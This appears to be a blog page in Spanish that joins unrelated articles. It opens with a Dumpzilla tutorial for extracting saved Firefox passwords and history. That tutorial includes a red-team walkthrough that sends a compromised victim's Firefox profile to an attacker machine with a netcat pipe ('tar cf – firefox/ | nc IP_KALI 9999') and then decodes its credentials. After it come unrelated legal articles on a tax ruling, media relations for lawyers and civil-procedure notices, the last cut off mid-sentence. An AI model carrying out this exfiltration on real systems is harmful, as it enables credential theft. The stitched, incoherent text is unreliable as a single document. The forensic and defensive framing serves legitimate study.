Dumpzilla: Cómo hacer un análisis forense a los usuarios de Mozilla Firefox

Como todos sabemos, la información que queda almacenada de las personas en los navegadores web, entre las que se encuentran nombres de los usuarios y contraseñas, cookies, historial de descargas y otros muchos datos resultan de gran valor para la seguridad y privacidad personal, por lo que es conveniente mantenerla protegida. Hoy os voy a hablar de una herramienta con la que nos topamos recientemente llamada dumpzilla y que tiene que ver precisamente con toda esa información que se almacena en los navegadores de Internet.

Dumpzilla Es una herramienta muy útil, versátil e intuitiva dedicada al análisis forense en navegadores Mozilla. Según el GitHub de la herramienta desarrollada para Python, Dumpzilla tiene la capacidad de extraer toda la información relevante de navegadores FirefoxIceweasel y Seamonkey para su posterior análisis de cara a ofrecer pistas sobre ataques sufridos, robo de información, contraseñas, correos, etcétera.

Figura 1: Dumpzilla en GitHub

Con esta herramienta se podemos acceder a un gran volumen de información valiosa, entre la que podemos encontrar:

• Cookies + almacenamiento DOM (HTML 5)

• Preferencias de usuario (permisos de dominio, ajustes de Proxy, etc…)

• Historial de visitas

• Historial de descargas

• Datos de formularios web (búsquedas, e-mails, comentarios, etc…)

• Marcadores

Además, Dumpzilla también contempla la opción –Watch, que permite auditar el uso de nuestro navegador en tiempo real. Por todo ello nos decidimos a jugar con esta herramienta para probar sus capacidades, centrándonos en Mozilla Firefox.

Instalación de Dumpzilla

El primer paso es conocer el directorio donde se almacena la información de los perfiles de usuario del navegador. Para cada SO:

• Linux: /home/user/.mozilla/firefox/xxxxxxxx.default

• MacOS: /Library/Application Support/Firefox/Profiles/ xxxxxxxx.default

• Windows XP: C:\Documents and Settings\user\Datos de programa\Mozilla\Firefox\Profiles\ xxxxxxxx.default

• Windows Vista, 7, 8 y 10: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ xxxxxxxx.default

En el caso que nos ocupa, hemos realizado la prueba en dos máquinas virtuales. Una con SO Kali Linux 2018.2 y otra con Ubuntu 16.04 LTS, por lo que el fichero con la información relativa a los perfiles de nuestro navegador se encuentra en la ruta /home/user/.mozilla/firefox/xxxxxxxx.defaultFirefox genera un fichero xxxxxxxx.default con 8 caracteres aleatorios y los asigna al nombre de un determinado perfil. Cada directorio puede ser procesado individualmente haciendo uso de Dumpzilla.

De cara a la instalación y uso de Dumpzilla, comenzaremos instalando algunos paquetes necesarios. Primero instalando algunos paquetes haciendo uso de pip:

pip install logging

Instalamos algunas librerías más haciendo uso de apt-get:

apt-get install python3 sqlite3 python-lz4 libnss3

A continuación, procedemos a descargar Dumpzilla. Aunque lo inmediato hubiera clonar el repositorio de GitHub de la herramienta, se reportó un bug en la última versión que provoca un fallo en la decodificación de las contraseñas guardadas en Firefox. Gracias al buen versionado de la herramienta, procedemos a descargar esta versión de Dumpzilla y a extraer la los ficheros comprimidos:

wget ‘https://github.com/Busindre/dumpzilla/archive/b3075d1960874ce82ea76a5be9f58602afb61c39.zip’

unzip b3075d1960874ce82ea76a5be9f58602afb61c39.zip

Figura 3: Extracción de Dumpzilla tras su descarga

Tras extraer los archivos, nos metemos en la carpeta recién creada dumpzilla- b3075d1960874ce82ea76a5be9f58602afb61c39/ con el contenido de scripts y carpetas de la versión correspondiente.

cd dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/

Damos permiso de ejecución del fichero dumpzilla.py

chmod +x dumpzilla.py

Una vez dados estos pasos, ya tendríamos Dumpzilla listo para su uso.

Primera prueba con Dimpzilla

Para comprobar que todo ha ido bien, podéis hacer una copia de los directorios donde se almacenan los ficheros con la información de los perfiles indicados anteriormente (en función de vuestro SO) a la carpeta dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ y probar a ejecutar el scriptsobre el que acabamos de dar permiso de ejecución.

Por ejemplo, para extraer las contraseñas de un determinado perfil de Firefox, sólo tenemos que hacer uso del siguiente comando (en el caso de estar trabajando en Linux):

python3 dumpzilla.py firefox/xxxxxxxx.default/ –Passwords

Figura 4: Presentación de usuarios y contraseñas de un perfil
de Mozilla Firefox tras la ejecución de Dumpzilla

python3 dumpzilla.py firefox/xxxxxxxx.default/ –History

Figura 5 Presentación de historial de un perfil
de Mozilla Firefox tras la ejecución de Dumpzilla

Como podéis ver, el uso de la herramienta es sencillo y se obtiene una gran cantidad de información que puede resultar útil siempre y cuando la intención de su uso sea lícita. Podéis ver todas las posibilidades de uso aquí en el Manual de Dumpzilla en Español. La información que extraigamos del navegador vendrá dada en función de los hábitos de uso del usuario, la versión del web browser y su configuración, así como del azar.

Estas herramientas también tienen valor en un escenario de pentesting, en donde un atacante de un Red Team quiere acceder información sensible de los usuarios de una máquina donde se está utilizando uno de estos navegadores.

Dumpzilla en un pentesting de un Red Team

Todo usuario de Firefox sabe que el navegador es capaz de gestionar múltiples perfiles. Estos perfiles se suelen usar con la intención aislar de los demás su actividad en el navegador. No nos hemos encontrado con restricciones en el acceso a perfiles, pues sólo tenemos uno habilitado en cada máquina virtual al ser una prueba de concepto rápida.

En el caso de que tuviéramos varios perfiles habilitados para varios usuarios, sólo podríamos acceder a la información de aquellos para los que nuestro usuario tiene permiso de lectura, quedando los otros perfiles sin visibilidad en el caso de no contar con acceso de administrador.

Poniendo un ejemplo sencillo, supongamos que un atacante ha creado un backdoor y que nuestra máquina se ha visto comprometida. Además, el atacante contaría con total probabilidad perfil root (administrador), lo que le permitiría acceder a toda la información de los perfiles de Firefox almacenados en esa carpeta, sin restricción en los permisos. Este tipo de ataque ya se trató en este artículo, al que os animamos a echar un vistazo.

Figura 6: Diagrama de obtención de datos de perfiles de Mozilla Firefox

Tomando como atacante la VM con SO Kali Linux y la VM de Ubuntu como víctima, podremos reproducir el ataque con sólo tres comandos. Situándonos en la máquina atacante, en la carpeta dumpzilla- b3075d1960874ce82ea76a5be9f58602afb61c39/ recurrimos a Netcat (una herramienta adecuada para supervisar y escribir sobre conexiones tanto TCP como UDP).

nc -l -p 9999 | tar x

A través de este comando pediremos a Netcat que escuche (-l) a través del puerto (-p) 9999 todo dato entrante especificado por tar. El x tras el comando tar indica que debe extraer y almacenar de manera automática todos los directorios comprimidos que vengan del netcat pipe. Los directorios se comprimen durante la transmisión de Netcat para facilitar a la propia herramienta el procesado de los datos. Podemos acceder como root a través de ssh a la máquina con backdoor:

ssh root@IP_UBUNTU

Dentro de la máquina atacada nos movemos a la carpeta donde se almacena toda la información de los perfiles:

cd /home/.mozilla/

para ejecutar

tar cf – firefox/ | nc IP_KALI 9999

Aquí hacemos uso del comando tar para comprimir el contenido de la carpeta firefox/ y dirigirlo haciendo uso del comando nc. La dirección IP del atacante queda representada por IP_KALI.

Hay que dar un cierto margen a la ejecución de este comando, en especial si el perfil de Firefox que queremos transferir contiene meses de historial, cookies y múltiples marcadores. Detener el proceso de manera abrupta podría corromper algunos ficheros y hacer imposible la decodificación de la información que nos interesa.

Ya de vuelta en nuestra máquina Kali Linux (la atacante) tendremos en nuestro directorio dumpzilla- b3075d1960874ce82ea76a5be9f58602afb61c39/ con al menos un directorio firefox/ con el naming xxxxxxxx.default/.

Figura 7: Contenido del directorio de dumpzilla tras la transferencia de firefox/ desde la víctima

De este directorio se podría extraer toda la información deseada, tal y como se mostró anteriormente con los comandos simples de la Figura 3 y la Figura 4, o siguiendo los comandos que se describen en el Manual de Dumpzilla en Español.

Reflexión final

Como se puede ver, hay herramientas más que preparadas para extraer toda la información de un usuario que se encuentra en un navegador. En este caso en Mozilla Firefox, Iceweasel y SeaMonkey, pero las herramientas existen para todos. Almacenar información como contraseñas de manera indiscriminada en el navegador y no actualizarlas con una cierta frecuencia puede llegar a poner en riesgo nuestras credenciales de acceso a nuestras diferentes cuentas.


Figura 8: Cómo proteger tu cuenta de Mozilla Firefox con Latch Cloud TOTP
Para mitigar que información sensible del usuario quede expuesta por este medio, algunas buenas prácticas sencillas que podrían dificultar la obtención de datos personales a través de este tipo de ataques podrían ser:

• Uso de la navegación privada, a pesar de la inconveniencia derivadas del mismo.

• Gestionar correctamente las contraseñas, a saber:

o Nunca hacer uso de diccionarios

o Poner passwords que no sean fáciles de adivinar

o Cambiar las contraseñas con frecuencia

o No usar la misma contraseña para diferentes cuentas

o Poner un Segundo Factor de Autenticación a todas tus identidades

• Como no, Proteger tus perfiles de Firefox con Latch Cloud TOTP.

Anuncios

El Tribunal Supremo fija doctrina sobre el método de comprobación del valor real de inmuebles a efectos del cálculo del Impuesto sobre Transmisiones Patrimoniales

La Sala III, de lo Contencioso-Administrativo, del Tribunal Supremo ha establecido como doctrina que el método de comprobación del valor real de inmuebles, a los efectos del cálculo del Impuesto sobre Transmisiones Patrimoniales, que posibilita la Ley General Tributaria, consistente en multiplicar el valor catastral por un coeficiente, no es idóneo ni adecuado, salvo que se complemente con una comprobación directa por parte de la Administración del inmueble concreto sometido a valoración.

El tribunal ha fijado esta doctrina en cuatro sentencias dictadas en los últimos días, donde ha examinado los recursos de la Junta de Castilla-La Mancha que pretendían elevar el valor declarado por cuatro contribuyentes, para liquidar el Impuesto de Transmisiones Patrimoniales, de las viviendas que adquirieron en el año 2012 a la inmobiliaria del Banco Santander en Seseña (Toledo), después de que dicha entidad se adjudicara dichos inmuebles que formaban parte de las promociones de “El Pocero”.

Los cuatro ciudadanos declararon como valor el precio declarado en la escritura por la compra, que oscilaba entre los 65.000 y los 82.000 euros, pero la Consejería de Hacienda elevó el valor a entre 120.000 y 130.000 euros, aplicando la comprobación señalada en el artículo 57.1.b de la Ley General Tributaria, es decir, multiplicando el valor catastral por el coeficiente del municipio establecido en una orden de la comunidad autónoma, subiéndoles de ese modo el importe del impuesto. El TSJ de Castilla-La Mancha, en sentencias ahora confirmadas por el Supremo, dio la razón a los contribuyentes en contra de la Hacienda autonómica.

El Supremo establece como doctrina que “el método de comprobación consistente en la estimación por referencia a valores catastrales, multiplicados por índices o coeficientes (artículo 57.1.b) de la Ley General Tributaria) no es idóneo, por su generalidad y falta de relación con el bien concreto de cuya estimación se trata, para la valoración de bienes inmuebles en aquellos impuestos en que la base imponible viene determinada legalmente por su valor real, salvo que tal método se complemente con la realización de una actividad estrictamente comprobadora directamente relacionada con el inmueble singular que se someta a avalúo”.

Añade que la aplicación de ese método de comprobación “no dota a la Administración de una presunción reforzada de veracidad y acierto de los valores incluidos en los coeficientes, figuren en disposiciones generales o no”, así como que “la aplicación de tal método para rectificar el valor declarado por el contribuyente exige que la Administración exprese motivadamente las razones por las que, a su juicio, tal valor declarado no se corresponde con el valor real, sin que baste para justificar el inicio de la comprobación la mera discordancia con los valores o coeficientes generales publicados por los que se multiplica el valor catastral”.

Carga de prueba de la administración

Y además, deja claro a quién corresponde la carga de la prueba en este terreno: “el interesado no está legalmente obligado a acreditar que el valor que figura en la declaración o autoliquidación del impuesto coincide con el valor real, siendo la Administración la que debe probar esa falta de coincidencia”.

En el caso concreto examinado, los contribuyentes defendieron que la inmobiliaria vendedora llevó a cabo una drástica reducción de precios, ampliamente publicitada en la urbanización donde compraron, atendiendo a las condiciones del mercado en el año 2012, por lo que nada permite sospechar que el precio real que pagaron no fuese el escriturado.

La Sala III contesta también a la pregunta de si, en caso de no estar conforme, el contribuyente puede utilizar cualquier medio de prueba admitido en Derecho o resulta obligado a promover una tasación pericial contradictoria para desvirtuar el valor real comprobado por la Administración tributaria a través del expresado método del artículo 57.1.b de la Ley´.

En este terreno, el Supremo confirma su jurisprudencia en el sentido de que la tasación pericial contradictoria no es una carga del interesado para desvirtuar las conclusiones del acto de liquidación en que se aplican los mencionados coeficientes sobre el valor catastral, sino que su utilización es meramente potestativa. Así, para oponerse a la valoración del bien derivada de la comprobación de la Administración basada en el medio consistente en los valores catastrales multiplicados por índices o coeficientes, el interesado puede valerse de cualquier medio admisible en derecho, debiendo tenerse en cuenta lo establecido sobre la carga de la prueba que recae en la Administración.

También señala la sentencia que en el seno del proceso judicial contra el acto de valoración o contra la liquidación derivada de aquél el interesado puede valerse de cualesquiera medios de prueba admisibles en Derecho, hayan sido o no propuestos o practicados en la obligatoria vía impugnatoria previa. Y fija también la Sala que la decisión del Tribunal de instancia que considera que el valor declarado por el interesado se ajusta al valor real, o lo hace en mayor medida que el establecido por la Administración, constituye una cuestión de apreciación probatoria que no puede ser revisada en el recurso de casación.

En relación a la orden de Castilla-La Mancha de diciembre de 2011, que establecía los diferentes coeficientes de las poblaciones, para valorar los bienes inmuebles, el TS indica que las explicaciones sobre la metodología usada para fijarlos es vaga, y “falta la expresión de una sola razón que permita comprender que en 2007 el coeficiente para Seseña fuera el 6,31 y cambiara a 1,88 en el año 2012, variación tan copernicana que habría merecido una mínima explicación a los ciudadanos, ausente en ambas órdenes autonómicas y en su acto de aplicación en la liquidación”.

Voto particular

La sentencia cuenta con el voto particular de uno de los seis magistrados que la han dictado, Nicolás Maurandi, quien comparte el fallo de desestimar los recursos de la Junta en el caso concreto, pero defiende en general que el uso de un sistema de coeficientes puede ser un instrumento eficaz y acorde al principio de seguridad jurídica, teniendo el contribuyente la posibilidad de hacer valer ante la Administración los datos singularizados del concreto bien inmueble que es objeto de comprobación.

 

¿Cómo acercar el trabajo del abogado a los medios de comunicación?

Comunicación jurídica, marketing jurídico… son conceptos que suenan cada vez más fuerte en el ejercicio de la profesión de abogado y que se han introducido, con mayor o menor intensidad, tanto en la gestión de los grandes despachos como en la de los de menor tamaño -sin olvidar a los profesionales individuales, muchas veces los más decididos a la hora de apostar por la comunicación-.

El objetivo último para el abogado suele ser la captación de clientes, pero el camino para alcanzar esta meta ulterior pasa necesariamente por alcanzar otra mucho más compleja y trascendental: la creación de una vía de comunicación eficaz con su público que contribuya a establecer un diálogo horizontal entre abogado y ciudadano. Establecer una estrategia de comunicación legal contribuye, en última instancia, a hacer más cercana una profesión tradicionalmente mal entendida y poco abierta –por motivos deontológicos- a esa necesaria aproximación.

Parte de ese trabajo de acercamiento del abogado a los ciudadanos -y potenciales clientes- pasa normalmente por establecer un vínculo con los medios de comunicación, auténticos altavoces para su actividad y canales casi siempre necesarios en cualquier estrategia de comunicación legal. Sin embargo, dar con la forma de generar ese vínculo requiere el conocimiento de ciertas técnicas y datos que, para quienes han estado al otro lado, resultan mucho más fáciles de identificar.

En este artículo intentamos trasladar algunas pautas, fruto del estudio del marketing legal y la comunicación jurídica –y, sobre todo, de la experiencia- como vía para tender puentes y generar un intercambio de inquietudes entre ambas partes de la ecuación. En definitiva, para generar una comunicación efectiva entre ellas que beneficie a ambas partes y, con ello, a toda la ciudadanía.

1. Comunicación jurídica: del mito a la realidad

Existen ciertas barreras –muchas veces mitos- que normalmente condicionan al abogado a la hora de decidirse a contactar con los medios como parte de una estrategia de comunicación legal:

– El necesario tecnicismo del lenguaje legal y lo complicado –que no imposible- de traducirlo a un lenguaje común sin perder rigor.

– La supuesta falta de interés del ciudadano de cara a conocer el fondo de los asuntos legales, incluso cuando se refieran a temas de actualidad.

– La idea preconcebida de que los medios de comunicación no van a considerar valiosa la información que podamos trasladarles.

– En definitiva, la distancia existente entre abogados y ciudadanos, íntimamente relacionada con el tradicional hermetismo del sector legal.

Como resultado, muchas veces los abogados se sienten solos cuando se trata de alzar la voz y explicar su postura o sus conocimientos. La falta de herramientas para hacerlo –que no inexistencia- acaba traduciéndose en mutismo y, con ello, en una pérdida de valiosas oportunidades para acercarse a sus potenciales clientes y ciudadanos en general de una forma eficaz. También para defender su verdad cuando la opinión pública –y los propios medios de comunicación- se vuelquen en un ‘linchamiento’ mediático que, desde el punto de vista legal, pueda considerarse injusto.

La realidad es que no es tan difícil definir una estrategia de comunicación y acercarse a los medios a través de ella. El día a día de la comunicación legal y el marketing jurídico como disciplinas consiste precisamente en construir ese puente entre abogado y ciudadano, y sin duda existen cada vez más casos de éxito en este sentido.

Además, ese éxito no se encuentra –ni mucho menos- vinculado necesariamente a los grandes despachos o las grandes inversiones: muchos abogados individuales con escasos recursos logran importantes posiciones en materia de comunicación, superando a despachos pequeños, medianos y grandes. Su éxito reside en invertir y utilizar sus recursos de forma inteligente y empática. En definitiva, en haber construido una estrategia de comunicación a medida, teniendo claro qué quieren comunicar y a quién, así como la importancia de su rol como parte del diálogo en torno a esa materia.

2. Claves para definir un plan de comunicación legal

Antes de acercar el trabajo del abogado a los medios de comunicación es importante tener en cuenta que no hay fórmulas universales, algo lógico teniendo en cuenta que, dado que el Derecho lo toca absolutamente todo, las realidades que abarca interesarán en mayor o menor medida a distintos tipos de personas. Hay ramas del Derecho más complejas que otras, casos especialmente sensibles y, sobre todo, públicos objetivos muy distintos a los que atender.

Por todo ello –y de forma muy esquemática-, lo primero es definir qué queremos comunicar y, en segunda instancia, a quién queremos hacerlo. Después tocará definir los canales adecuados para transmitir cada mensaje y, en última instancia, crear y mantener ese lazo con quienes lo reciban.

1. ¿Qué queremos comunicar?

El primer paso, por sencillo que parezca, consiste en definir qué queremos comunicar. Y no es tarea fácil. Muchas veces requiere un ejercicio de autodefinición, de acotamiento de nuestro trabajo, de reflexión acerca del camino que queremos tomar… Puede que nos hayamos dedicado a un tipo de materias en concreto pero que queramos cambiar de rumbo, optar por vías más rentables, explorar nuevas posibilidades que supongan un mayor estímulo intelectual, aprovechar la oleada de trabajo que pueda generar una reforma legislativa concreta…

Siempre es recomendable acotar cuál va a ser la actividad del abogado o del despacho, definir materias y, una vez cercada el área de trabajo, desglosar áreas de menor tamaño (casos concretos, dudas que tengan o que puedan tener los clientes con respecto a ellos…) para definir distintos mensajes. Se trata de un proceso clave al que merece la pena dedicar tiempo y recursos, ya que cuando definimos qué queremos decir estamos definiendo nuestros pilares, y éstos no deben cambiar a menudo, sino permanecer estables.

2. ¿A quién queremos comunicar?

Tanto si tu objetivo es meramente divulgativo como si buscas la captación de clientes, es aconsejable acotar a quién quieres llegar en lugar de dirigir tu mensaje a la generalidad del público. Para ello existe un concepto muy utilizado en marketing en general –y también en marketing jurídico- que es el de buyer persona. Se trata de una persona semi-fictica o ‘retrato robot’ de nuestro destinatario final, y que puedes definir planteándote preguntas como su edad, sexo, ocupación, nivel de ingresos, hobbies, intereses, formas de consumir información…  Lo habitual es ponerle nombre e incluso asociarlo a una imagen concreta que represente su personalidad.

Es posible (y probable) que puedas definir más de un buyer persona para tu despacho, dado que habrá distintos servicios que puedas ofertar. Eso significa que deberás distinguir qué mensajes irán dirigidos a qué buyer persona, pensando en ellos a la hora de comunicar pero sin perder de vista la esencia de tu marca. Del mismo modo, es importante apoyarte, de cara a la construcción de tus buyer persona, en cuantos más datos objetivos mejor (estudios de mercado, tus propias estadísticas…)

3. ¿A través de qué medios o canales voy a comunicar?

Se trata, en este punto, de definir cómo llegar a nuestro público y, para ello, debemos analizar de qué forma consume información: Internet, radio, televisión, prensa (especializada o generalista), medios regionales, revistas, SMS, newsletter, redes sociales…

A día de hoy nos enfrentamos a una comunicación multicanal: esto significa que la mayoría de nosotros consumimos información a través de distintos canales y, la mayoría del tiempo, lo hacemos a través de nuestros teléfonos móviles. Existen estudios en este sentido que pueden ayudarte a definir qué canales son mejores para tu caso.

4. ¿Cómo cerrar el vínculo y mantenerlo en el tiempo?

No basta con llegar al receptor: para una comunicación efectiva necesitamos que éste se ponga en contacto con nosotros –o nos permita que nos pongamos en contacto con él-, en atender a sus dudas y necesidades –‘curar’ su dolor-, cerrar el vínculo y mantenerlo en el futuro en la medida de lo posible, buscando la fidelización y la atención a otras necesidades legales que pueda tener.

Esta fase es tan importante o más que las anteriores, y su análisis –así como el del resto de etapas- daría lugar por sí solo a varios artículos tanto o más extensos que éste. Como resumen, basta decir que hacer bien los deberes en este sentido significará un cliente contento, y éste puede ser el mejor embajador de tu marca.

3. ¿Cómo acercar el trabajo del abogado a los medios de comunicación?

Una vez definido el plan de comunicación legal -por básico que éste sea-, incluyendo el mensaje que queremos transmitir y a través de qué canales, tocará ponerse manos a la obra y dar forma a ese mensaje, así como contactar con los medios adecuados para ponerlo en circulación.

Para ello, en este apartado nos centramos en dar algunas pautas para evitar que se produzca una ruptura entre emisor (tu despacho) y receptor (el ciudadano o consumidor) en los casos en que tratamos de acercarnos al público final a través de los medios de comunicación. En otras palabras: ¿qué debes hacer para que tu contacto con el medio sea efectivo?

Prácticamente cualquier plan de comunicación jurídica pasará por intentar transmitir ciertos mensajes a través de distintos medios de comunicación (Internet, prensa, radio, televisión…) para mejorar el alcance de nuestras acciones y acercarnos a más personas: insistimos en que se trata de importantes voceros para cualquier empresa. Pero hay que tener claro que para llegar a ellos de forma natural (sin publicidad de por medio) y aparecer en ellos en forma de noticia, debemos ofrecerles información relevante.

1. Selecciona bien el mensaje que quieres transmitir

No cualquier mensaje es apto para ser trasladado a un periodista, por lo que debes ser selectivo a la hora de intentar contactar con un profesional (sobre todo cuando se trate de un primer contacto a puerta fría) para trasladarle un contenido. Parece evidente, pero muchas empresas -y muchos despachos, e incluso responsables de comunicación sin experiencia en medios- no comprenden que la labor del periodista no es hacer publicidad ni dar cabida a cualquier empresa, sino informar. Quienes hacen bien su trabajo huyen de cualquier contacto que suene a publicidad. Al contrario, estarán dispuestos a dar cabida a tu noticia si se produce un verdadero win-win: el medio gana gracias a tu contenido, y tú ganas gracias a su mención.

Por eso, ofrece algo realmente relevante, algo que, como consumidor final, te gustaría saber: una sentencia que abra la puerta a la defensa de los derechos de un colectivo, un cambio jurisprudencial, un punto de una reciente reforma legislativa que haya pasado inadvertido y cuyas consecuencias sean relevantes, una guía con consejos para actuar ante cierto caso mediático o frecuente… En definitiva, una verdadera noticia, donde el nombre de tu despacho consiga aparecer por méritos propios y sin dinero de por medio, y donde la utilidad de la información sea evidente.

A nivel de comunicación interna, mueve a tu despacho para que sus miembros introduzcan en su rutina diaria identificar estos posibles casos de información, si no cuentas con un perfil de comunicación interno o externo que se dedique a ello.

2. Huye del ‘autobombo’

Incluso aunque el mensaje seleccionado sea perfectamente interesante y noticiable, una mala forma de comunicarlo puede dar al traste con todo el trabajo realizado. El nombre de tu despacho, el del abogado que ha llevado el caso, el volumen de tu negocio… son datos secundarios para el periodista: lo que interesa (especialmente en titular, entradilla… de tu nota de prensa) es la noticia (piensa en el lector final a la hora de enfocar su redacción) y, de forma elegante y secundaria, puedes incluir información sobre quién la facilita y, en cierto modo, protagoniza.

A la hora de trasladar el tema al periodista, por supuesto es importante hacerle saber que te gustaría que tu despacho fuera mencionado, aunque lo normal –y lo ético- será que la mención se produzca de forma natural, ya que serás la fuente de información que le ha permitido acceder a esa noticia y trasladarla a sus lectores.

3. Filtra bien a quién quieres dirigirte

Al hilo de la introducción a este artículo, ten en cuenta que normalmente cada periodista se encarga de un área concreta, por lo que deberás crear un pequeño listado con los nombres de aquellos profesionales con los que te interese contactar, centrándote en quienes muestren un especial interés o dedicación al área que vas a comunicar.

Además, ten en cuenta que unos medios tienen más lectores que otros, y que el lector al que llega el medio debe corresponderse con el lector al que quieres llegar. Un asunto legal relacionado con empresas, por ejemplo, podrá tener mayor repercusión en un medio de comunicación económico, en el área de economía de un medio generalista, en una revista sobre negocios… Del mismo modo, aparecer en un medio con mayor audiencia facilitará normalmente un éxito mayor, siempre que se dirija al público adecuado.

4. Explícate lo mejor posible

Es cierto que el lenguaje legal es necesariamente técnico y complejo, que es complicado trasladar años de estudio y trabajo a una nota de prensa… pero el periodista necesita recibir información que comprenda, identificar rápido por qué es relevante, contar con todos los datos necesarios y poder ampliar información a través de un contacto directo en el despacho.

Si no quieres delegar la tarea de redactar una nota de prensa en un profesional de la comunicación legal, te aconsejamos ponerte en la piel del lector y cubrir cada ángulo de posible duda que se te ocurra, ordenar la información según su importancia, ser conciso pero didáctico y tener en cuenta el espacio –normalmente limitado- que podrá dar el periodista a tu noticia a la hora de redactar. La realidad es que esta es la parte más complicada y, ante la duda, lo mejor es ponerse en manos de profesionales.

5. Cultiva relaciones y conviértete en fuente habitual

Muchas veces los periodistas se enfrentan a dudas legales en su día a día y necesitan contactar con abogados para aclararlas. A cambio, suele generarse una mención en la noticia a la fuente consultada.  Si quieres convertirte en ese abogado al que el profesional de la información llame en caso de duda, debes ser rápido en tu respuesta (la información se mueve a ritmo de vértigo), certero (mueve tus hilos cuanto antes para tener una respuesta completa) y claro (el periodista debe entenderte a la perfección).

También es recomendable “mojarse” con las respuestas, manifestando tu postura o la de tu despacho, aunque con cuidado y evitando en la medida de lo posible ofender a nadie. La clave está en permanecer disponible y ser ágil a la hora de responder. También puedes adelantarte y, por ejemplo, ofrecer tus comentarios ante un caso de actualidad si sabes que tu contacto en prensa va a informar sobre ello.

4. Conclusión

En definitiva, llegar al público a través de los medios de comunicación y hacerse un hueco en el mercado –y en el diálogo social- está en manos de cualquier profesional del Derecho, aunque ello requiere una labor de análisis interno, autodefinición y creación del plan de comunicación adecuado para cada caso. Se trata de una labor compleja pero altamente gratificante que puede ayudarte a crecer como profesional y, como resultado, a hacer que tu negocio crezca contigo. Sea cual sea el tamaño de tu despacho, existen vías para lograr difundir tu mensaje y, al mismo tiempo, ayudar a derribar ese muro que muchas veces separa al sector legal del común de los ciudadanos, y que ni mucho menos es imposible de derribar.

La negativa a recibir comunicaciones judiciales por terceros en el ámbito del proceso civil. El artículo 161.3 de la Ley de Enjuiciamiento Civil

El artículo 161.2 de la Ley de Enjuiciamiento Civil establece que cuando el destinatario de la comunicación sea hallado en el domicilio y se niegue a recibir la copia de la resolución o la cédula o no quiera firmar la diligencia acreditativa de la entrega, el funcionario o procurador que asuma su práctica le hará saber que la copia de la resolución o de la cédula queda a su disposición en la oficina judicial, produciéndose los efectos de la comunicación, de todo lo cual quedará constancia en la diligencia.

Así, el art 161.3 establece que si el domicilio donde se pretenda practicar la comunicación fuere el lugar en el que destinatario tenga su domicilio según el padrón municipal, o a efectos fiscales, o según el registro oficial o publicaciones de los colegios profesionales, o fuere la vivienda o local arrendado al demandado, y no se encontrase allí dicho destinatario, “podrá” efectuarse la entrega, en sobre cerrado, a cualquier empleado, familiar o persona con la que conviva, mayor de catorce años, que se encuentre en ese lugar, o al conserje de la finca, si lo tuviere, advirtiendo al receptor que está obligado a entregar la copia de la resolución o la cedula al destinatario de ésta, o darle aviso, si sabe de su paradero, advirtiendo en todo caso al receptor de su responsabilidad en relación a la protección de los datos del destinatario.

Si la comunicación se dirigiere al lugar de trabajo no ocasional del destinatario, en ausencia de éste, la entrega se efectuará a persona que manifieste conocer a aquel o, si existiere dependencia encargada de recibir documentos u objetos, a quien estuviere a cargo de ella, con las mismas advertencias del párrafo anterior.

En la diligencia se hará constar el nombre de la persona destinataria de la comunicación y la fecha y la hora en la que fue buscada y no encontrada en su domicilio, así como el nombre de la persona que recibe la copia de la resolución o de la cédula y la relación de dicha persona con el destinatario, produciendo todos sus efectos la comunicación así realizada.

Así, el art 152.1, párrafo tercero, establece que se tendrán por válidamente realizados estos actos de comunicación, cuando en la diligencia quede constancia suficiente de haber sido practicados en la persona, en el domicilio.

Uno de los problemas que surge en los supuestos de comunicaciones a través de terceros, son aquellos en los que esa persona intermedia (tercero) se niega a recibir dicha comunicación, o a identificarse o firmar la diligencia, ya que el art 161.3 utiliza el término “podrá”. En principio, la utilización de dicho término descarta la existencia de una obligación por parte del tercero de aceptar dicha comunicación, cuestión distinta es que esa obligación se hubiera previsto expresamente tal y como se prevé en otros ámbitos de nuestro ordenamiento jurídico. Sin que, por otro lado, podamos olvidar el deber de colaboración con los órganos judiciales,  proclamado por el artículo 118 de la Constitución.

Ante la situación descrita nos podríamos preguntar ¿resulta aplicable la previsión establecida en el apartado 2 a los supuestos del apartado número 3 de dicho precepto? Es decir, ante la negativa a ser notificado o la negativa a firmar la diligencia de entrega por parte del tercero ¿puede entenderse efectuada la notificación a través del tercero y por lo tanto válidamente realizada la comunicación?

Es cierto, que parte de la doctrina se muestra reticente a admitir dicha posibilidad, pero no podemos olvidar que existe un gran número de resoluciones judiciales que admiten dicha posibilidad, todo ello, a pesar del rigorismo que parece expresar el apartado expresado, es decir, que se trate del domicilio del demandado, la vivienda o local arrendado al demandado, o el lugar de trabajo no ocasional, que la entrega deba hacerse a una empleado, familiar o persona con la que conviva, mayor de 14 años, o al conserje, y además, de tratarse del lugar de trabajo, debe entenderse con quien manifieste conocer al destinatario o en la dependencia destinada a la recepción de documentos, y en todo caso, con la advertencia de la obligación que tiene el receptor de dar traslado de la resolución o cédula o aviso. Exigiéndose que quede identificado el destinatario de la comunicación, la fecha y hora de búsqueda, la identificación de la persona que recibe la comunicación y su relación con el destinatario.

Pues bien, podemos ver como ese supuesto rigorismo es atemperado por distintas resoluciones judiciales (la casuística es muy diversa), no sin advertir que, como en otros supuestos, existen resoluciones contrarias a la extensión de esa consecuencia (entender practicada la comunicación); ejemplo de esas resoluciones son la SAP de Málaga, Sección Quinta, de 2 / 2 / 2016, referida a la esposa que se negó a hacerse cargo de un emplazamiento de una sociedad cuyo marido era el administrador, estableciendo, en su Fundamento Tercero, como cuestión previa cabe decir que, es reiterada la jurisprudencia tanto de nuestro Tribunal Supremo como del Tribunal Constitucional en relación con la transcendencia de los actos de comunicación que, no realizados en correcta forma, no garantizan el conocimiento del proceso y la presencia del citado. Sin embargo, ello no quiere decir que cualquier irregularidad en la citación deba llevar al otorgamiento del amparo o nulidad. A este respecto, lo decisivo es determinar si por los medios que se usaron para citar, emplazar o notificar se puede inferir racionalmente que la comunicación llegara a su destinatario, al margen de formalismos. Y ello es así, porque cualquiera que fuesen los defectos procesales en los que se haya incurrido, lo cierto y evidente es que para acordar la nulidad instada, los mismos han de haber producido indefensión, concepto este último que no debe confundirse con infracción procesal, pues no todas generan aquélla. En el caso de autos, el apelante reconoce expresamente que la persona con la que se entendió la diligencia de emplazamiento… fue efectivamente su esposa, lo que permite concluir que el acto de comunicación procesal se realizó de forma correcta, ajustándose a la ley y con la idoneidad suficiente como para que el demandado tuviera conocimiento del objeto de dicha diligencia, lo que impide imputar la indefensión. Y si dejó transcurrir el término del emplazamiento conferido, lo fue por una 